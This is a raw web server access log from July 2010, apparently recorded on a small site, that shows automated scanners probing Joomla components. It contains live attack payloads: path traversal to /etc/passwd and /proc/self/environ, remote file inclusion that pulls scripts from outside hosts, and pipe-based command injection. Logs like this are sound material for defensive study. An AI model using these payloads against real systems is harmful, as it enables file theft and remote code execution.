202.29.92.6 - - [26/Jul/2010:17:51:40 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:51:40 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:51:53 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:52:18 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:52:20 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.29.92.6 - - [26/Jul/2010:17:52:40 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:11:45 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:19:02 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:19:05 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:19:06 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:21:43 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
70.86.235.162 - - [26/Jul/2010:18:45:28 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
67.195.112.178 - - [26/Jul/2010:18:50:58 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.178 - - [26/Jul/2010:18:50:58 +0200] "GET /logs/ HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.215.207 - - [26/Jul/2010:18:56:24 +0200] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
94.23.215.207 - - [26/Jul/2010:18:56:24 +0200] "GET /logs/error_log%20%20/e404.php?DOCUMENT_ROOT=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
94.23.215.207 - - [26/Jul/2010:18:56:24 +0200] "GET /e404.php?DOCUMENT_ROOT=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
94.23.215.207 - - [26/Jul/2010:18:56:55 +0200] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
94.23.215.207 - - [26/Jul/2010:18:56:55 +0200] "GET /e404.php?DOCUMENT_ROOT=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
94.23.215.207 - - [26/Jul/2010:18:56:55 +0200] "GET /logs/error_log%20%20/e404.php?DOCUMENT_ROOT=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
70.86.235.162 - - [26/Jul/2010:18:57:09 +0200] "POST /logs/access_log/contact.php HTTP/1.1" 404 313 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
70.86.235.162 - - [26/Jul/2010:18:57:09 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
70.86.235.162 - - [26/Jul/2010:18:57:10 +0200] "POST /logs/contact.php HTTP/1.1" 404 302 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
70.86.235.162 - - [26/Jul/2010:18:59:24 +0200] "POST /logs/access_log/contact.php HTTP/1.1" 404 313 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
70.86.235.162 - - [26/Jul/2010:18:59:24 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
70.86.235.162 - - [26/Jul/2010:18:59:24 +0200] "POST /logs/contact.php HTTP/1.1" 404 302 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
212.92.13.125 - - [26/Jul/2010:19:08:45 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
212.92.13.125 - - [26/Jul/2010:19:08:45 +0200] "POST /logs/contact.php HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"
74.55.73.74 - - [26/Jul/2010:19:09:23 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
211.202.2.34 - - [26/Jul/2010:19:13:58 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 362 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:13:58 +0200] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 367 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:13:58 +0200] "GET /logs/access_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 378 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:13:59 +0200] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 367 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:13:59 +0200] "GET /logs/access_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 378 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:13:59 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 362 "-" "stealth solo"
79.87.14.150 - - [26/Jul/2010:19:15:10 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://wang.es/c100.txt? HTTP/1.1" 404 361 "-" "Mozilla/3.0 (compatible; Indy Library)"
74.55.73.74 - - [26/Jul/2010:19:26:34 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:19:26:34 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:19:26:34 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
211.202.2.34 - - [26/Jul/2010:19:29:07 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 301 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:29:07 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 312 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:29:07 +0200] "GET //index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 296 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:29:07 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:29:08 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:29:08 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:34:34 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:34:34 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:34:34 +0200] "GET //index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:34:35 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:34:35 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:34:35 +0200] "GET //index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:36:20 +0200] "GET //index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:36:20 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:36:20 +0200] "GET /logs/access_log%20%20//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:36:20 +0200] "GET //index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:36:20 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:36:20 +0200] "GET /logs/access_log%20%20//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:40:07 +0200] "GET //index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:40:07 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:40:07 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:40:07 +0200] "GET //index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:40:08 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:19:40:08 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
195.186.81.78 - - [26/Jul/2010:20:02:27 +0200] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 316 "-" "Mozilla/5.0"
195.186.81.78 - - [26/Jul/2010:20:02:28 +0200] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 311 "-" "Mozilla/5.0"
211.202.2.34 - - [26/Jul/2010:20:06:56 +0200] "GET //index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:06:56 +0200] "GET /logs//index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:06:56 +0200] "GET /logs/access_log%20%20//index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:06:57 +0200] "GET /logs//index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:06:57 +0200] "GET //index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:06:57 +0200] "GET /logs/access_log%20%20//index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
217.16.18.219 - - [26/Jul/2010:20:21:07 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:13 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:13 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:13 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:19 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:19 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:19 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:25:57 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:26:40 +0200] "GET /logs/access_log/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:26:40 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:26:40 +0200] "GET /logs/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:51:02 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:51:02 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:51:03 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:02:31 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:02:42 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:02:45 +0200] "GET /logs/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:02:45 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:02:58 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:04:50 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:37 +0200] "GET /logs/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:37 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:46 +0200] "GET /logs/access_log/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:47 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:47 +0200] "GET /logs/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:06:25 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:06:26 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:06:26 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:08:27 +0200] "GET /logs/access_log/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:08:28 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:08:28 +0200] "GET /logs/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
188.165.217.175 - - [26/Jul/2010:21:11:04 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.127.248.175 - - [26/Jul/2010:21:12:03 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:12:03 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
217.16.18.219 - - [26/Jul/2010:21:13:47 +0200] "GET /logs/access_log/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:13:47 +0200] "GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:13:47 +0200] "GET /logs/index.php?option=com_jwhmcs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
112.104.57.22 - - [26/Jul/2010:21:13:58 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:13:59 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:13:59 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:14:43 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:14:43 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:14:44 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:15:53 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:15:54 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:15:54 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:16:38 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:16:39 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:16:39 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:16:57 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:17:02 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:17:45 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:17:45 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:18:02 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:18:02 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:18:17 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:18:17 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:18:18 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:19:02 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:19:03 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:19:23 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:21:19:24 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
94.23.8.200 - - [26/Jul/2010:21:21:28 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
81.93.240.46 - - [26/Jul/2010:21:21:30 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
